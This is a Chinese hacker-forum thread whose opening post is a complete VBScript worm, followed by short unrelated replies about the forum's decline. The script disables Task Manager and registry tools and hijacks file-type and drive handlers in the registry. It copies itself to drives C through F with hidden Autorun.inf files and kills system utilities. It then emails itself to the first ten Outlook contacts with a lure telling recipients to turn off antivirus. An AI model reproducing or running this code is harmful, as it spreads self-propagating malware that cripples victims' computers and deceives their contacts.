vbs病毒

Andrea · 发表于 2023-12-9 21:07:33

on error resume next
set wshshell=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.getfile(wscript.scriptfullname)
set ol=createobject("outlook.application")
set mail=ol.createitem(0)
wshshell.run "https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Command Processor\Autorun","exit"
wshshell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
wshshell.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr",1,"REG_DWORD"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\auto\command\","C:\Script.Girl.vbs"
wshshell.regwrite "HKEY_CLASSES_ROOT\Drive\shell\","auto"
wshshell.regwrite "HKEY_CLASSES_ROOT\Drive\shell\auto\command\","C:\Script.Girl.vbs"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\","auto"
wshshell.regwrite "HKEY_CLASSES_ROOT\Directory\shell\auto\command\","C:\Script.Girl.vbs"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\auto\command\","C:\Script.Girl.vbs"
wshshell.regwrite "HKEY_CLASSES_ROOT\exefile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CLASSES_ROOT\txtfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CLASSES_ROOT\batfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CLASSES_ROOT\inifile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg\","txtfile"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","Hello!Let me play a little joke on you"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","Your computer has been infected with a virus!Kill the virus!Quickly antivirus or reinstall the computer!"
myfile.copy "C:"
myfile.copy "D:"
myfile.copy "E:"
myfile.copy "F:"
set t1=fso.createtextfile("C:\Autorun.inf",true)
t1.writeline("[AutoRun]")
t1.writeline("open=Script.Girl.vbs")
t1.writeline("shellexecute=Script.Girl.vbs")
t1.writeline("shell\Auto\command=Script.Girl.vbs")
t1.writeline("[AutoRun]")
t1.writeline("open=Script.Girl.exe")
t1.writeline("shellexecute=Script.Girl.exe")
t1.writeline("shell\Auto\command=Script.Girl.exe")
set t2=fso.createtextfile("D:\Autorun.inf",true)
t2.writeline("[AutoRun]")
t2.writeline("open=Script.Girl.vbs")
t2.writeline("shellexecute=Script.Girl.vbs")
t2.writeline("shell\Auto\command=Script.Girl.vbs")
t2.writeline("[AutoRun]")
t2.writeline("open=Script.Girl.exe")
t2.writeline("shellexecute=Script.Girl.exe")
t2.writeline("shell\Auto\command=Script.Girl.exe")
set t3=fso.createtextfile("E:\Autorun.inf",true)
t3.writeline("[AutoRun]")
t3.writeline("open=Script.Girl.vbs")
t3.writeline("shellexecute=Script.Girl.vbs")
t3.writeline("shell\Auto\command=Script.Girl.vbs")
t3.writeline("[AutoRun]")
t3.writeline("open=Script.Girl.exe")
t3.writeline("shellexecute=Script.Girl.exe")
t3.writeline("shell\Auto\command=Script.Girl.exe")
set t4=fso.createtextfile("F:\Autorun.inf",true)
t4.writeline("[AutoRun]")
t4.writeline("open=Script.Girl.vbs")
t4.writeline("shellexecute=Script.Girl.vbs")
t4.writeline("shell\Auto\command=Script.Girl.vbs")
t4.writeline("[AutoRun]")
t4.writeline("open=Script.Girl.exe")
t4.writeline("shellexecute=Script.Girl.exe")
t4.writeline("shell\Auto\command=Script.Girl.exe")
wshshell.run "cmd /c attrib +h C:\Autorun.inf"
wshshell.run "cmd /c attrib +h D:\Autorun.inf"
wshshell.run "cmd /c attrib +h E:\Autorun.inf"
wshshell.run "cmd /c attrib +h F:\Autorun.inf"
wshshell.run "cmd /c taskkill -f -im cmd.exe"
wshshell.run "cmd /c taskkill -f -im notepad.exe"
wshshell.run "cmd /c taskkill -f -im regedit.exe"
wshshell.run "cmd /c taskkill -f -im taskmgr.exe"
for x=1 to 10
mail.to=ol.getnamespace("mapi").addresslists(1).addressentries(x)
mail.subject="Cute and sexy sailor girl"
mail.body="Would you like to see more pictures of sailor girls?The installer is in the attachment.Setup does not write the publisher.Please turn off the antivirus software before installing it"
mail.attachments.add("https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43")
mail.attachments.add("C:\Script.Girl.vbs")
mail.attachments.add("C:\Script.Girl.exe")
mail.send
next

幻剑游云 · 发表于 2023-12-11 23:24:52

好久没看到活人了！

沉默的某人 · 发表于 2023-12-14 22:26:00

幻剑游云发表于 2023-12-11 23:24
好久没看到活人了！

到底发生了什么？

幻剑游云 · 发表于 2023-12-15 23:09:29

沉默的某人发表于 2023-12-14 22:26
到底发生了什么？

两次整改，一次合作，一次大删帖，一次强制实名，一次换域名，你说哪个？

H.U.C清风 · 发表于 2023-12-16 13:17:10

幻剑游云发表于 2023-12-11 23:24
好久没看到活人了！

哈哈，我还在。

幻剑游云 · 发表于 2023-12-16 20:08:12

H.U.C清风发表于 2023-12-16 13:17
哈哈，我还在。

偏爱没看见你呢

H.U.C清风 · 发表于 2023-12-17 12:47:07

幻剑游云发表于 2023-12-16 20:08
偏爱没看见你呢

主要是我不怎么发帖

		自动登录	找回密码
密码			注册

[脚本语言] vbs病毒

站点统计| 举报| Archiver| 手机版| 黑屋 |

备案号：冀ICP备20006029号-1 Powered by HUC © 2001-2021 Comsenz Inc.

[脚本语言] vbs病毒

站点统计| 举报| Archiver| 手机版| 黑屋 | pgvMain({"discuzParams":{"r2":"3503899","ui":0,"rt":"forum","md":"viewthread","fi":"6","ti":"1343","pn":1,"qq":"000"},"extraParams":""});

备案号：冀ICP备20006029号-1 Powered by HUC © 2001-2021 Comsenz Inc.

站点统计| 举报| Archiver| 手机版| 黑屋 |